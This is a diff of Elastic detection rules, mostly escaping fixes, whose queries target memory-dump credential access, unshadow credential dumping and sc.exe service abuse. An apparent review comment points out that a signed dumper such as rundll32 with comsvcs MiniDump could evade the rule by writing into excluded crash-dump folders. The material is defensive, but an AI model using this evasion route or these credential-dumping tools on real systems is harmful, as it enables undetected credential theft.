@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Memory Dump File Creation", - "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n /* MDMP header */\n file.Ext.header_bytes : \"4d444d50*\" and file.size \u003e= 30000 and\n not\n\n (\n (\n process.executable : (\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WUDFHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Taskmgr.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\bin\\\\zCrashReport64.exe\"\n ) and process.code_signature.trusted == true\n ) or\n (\n file.path : (\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\WDF\\\\*\",\n \"?:\\\\ProgramData\\\\Alteryx\\\\ErrorLogs\\\\*\",\n \"?:\\\\ProgramData\\\\Goodix\\\\*\",\n \"?:\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\logs\\\\zoomcrash*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\Crashpad\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\crashpaddb\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\HungReports\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\NativeCrashReporting\\\\*\"\n ) and (process.code_signature.trusted == true or process.executable == null)\n )\n )\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n /* MDMP header */\n file.Ext.header_bytes : \"4d444d50*\" and file.size >= 30000 and\n not\n\n (\n (\n 
process.executable : (\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WUDFHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Taskmgr.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\bin\\\\zCrashReport64.exe\"\n ) and process.code_signature.trusted == true\n ) or\n (\n file.path : (\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\WDF\\\\*\",\n \"?:\\\\ProgramData\\\\Alteryx\\\\ErrorLogs\\\\*\",\n \"?:\\\\ProgramData\\\\Goodix\\\\*\",\n \"?:\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\logs\\\\zoomcrash*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\Crashpad\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\crashpaddb\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\HungReports\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\NativeCrashReporting\\\\*\"\n ) and (process.code_signature.trusted == true or process.executable == null)\n )\n )\n", "related_integrations": [ { "package": "endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_103.json b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_103.json index de2043dbaf0..d65c12d9480 100644 
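Review bot: The second exclusion branch of the new query (the `file.path :` list) suppresses any MDMP write into paths such as `?:\\Users\\*\\AppData\\*\\CrashDumps\\*` whenever the writing process is trusted-signed or has no recorded executable, so a Microsoft-signed living-off-the-land dumper (presumably `rundll32.exe` with comsvcs MiniDump, or a Sysinternals `procdump`) whose output file is simply directed under one of those directories would not alert. The `process.executable == null` arm is the larger gap, since it is satisfied by telemetry loss rather than by anything attributable to a crash reporter. Consider tightening that branch to known crash-handler names alongside the signature check, e.g. `and process.name : ("WerFault.exe", "WerFaultSecure.exe", "crashpad_handler.exe", "*CrashReport*.exe")`, or at minimum dropping the `process.executable == null` arm, and validate against your WER/Crashpad baseline first. The first branch's `?:\\Program Files\\*.exe` and `?:\\Program Files (x86)\\*.exe` entries likewise exempt any trusted-signed binary installed under Program Files, which is broader than the crash-reporter intent the neighbouring entries suggest.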
--- a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_103.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_104.json b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_104.json index 000a6651be2..b57371ac9ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_104.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_105.json b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_105.json index 91d84336144..b7d75df8a1f 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_105.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_105.json b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_105.json index fea5d6be95e..5b2252426a3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_105.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_2.json b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_2.json index 12a04ff6933..6789a2c6771 100644 --- a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_2.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_4.json b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_4.json index 14208605bcf..52e3636d2ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_4.json +++ b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_4.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_1.json b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_1.json index 7ca39de3fc9..c640a87d179 100644 --- a/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_1.json 
@@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_2.json b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_2.json index dd45cd492f2..0a1be102242 100644 --- a/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_2.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_1.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_1.json index 70b3fada847..030106c8c65 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_1.json 
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action == \"exec\" and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action == \"exec\" and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_2.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_2.json index 9934f741319..b48ad34a369 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_2.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_3.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_3.json index b1d64f3b7e1..52f2f5c7256 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_3.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_3.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_4.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_4.json index 6bc62a59ebf..e490b24cead 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_4.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_4.json 
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_5.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_5.json index 854c4ca0f78..a541a568361 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_5.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_5.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], 
@@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_6.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_6.json index 9302ca0b4a4..65d3d8a9b20 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_6.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_6.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_102.json b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_102.json index c3a1075d842..1802f2a3744 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_102.json 
@@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_103.json b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_103.json index 5d0108488eb..65107de23c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_103.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_104.json b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_104.json index 5281b47191b..a0528f04d14 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_104.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_205.json b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_205.json index 779831eacf3..d3be5d36f2c 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_205.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_205.json 
@@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_103.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_103.json index f59807babad..1d62280c780 100644 --- a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_103.json @@ -70,7 +70,7 @@ ], "risk_score": 21, "rule_id": "e8571d5f-bea1-46c2-9f56-998de2d3ed95", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_104.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_104.json index d0766c15971..c51e44958b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_104.json 
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Control Spawned via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the 
environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the 
account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", "related_integrations": [ { @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_105.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_105.json index acf4481386a..9dfd85ee216 100644 --- a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_105.json 
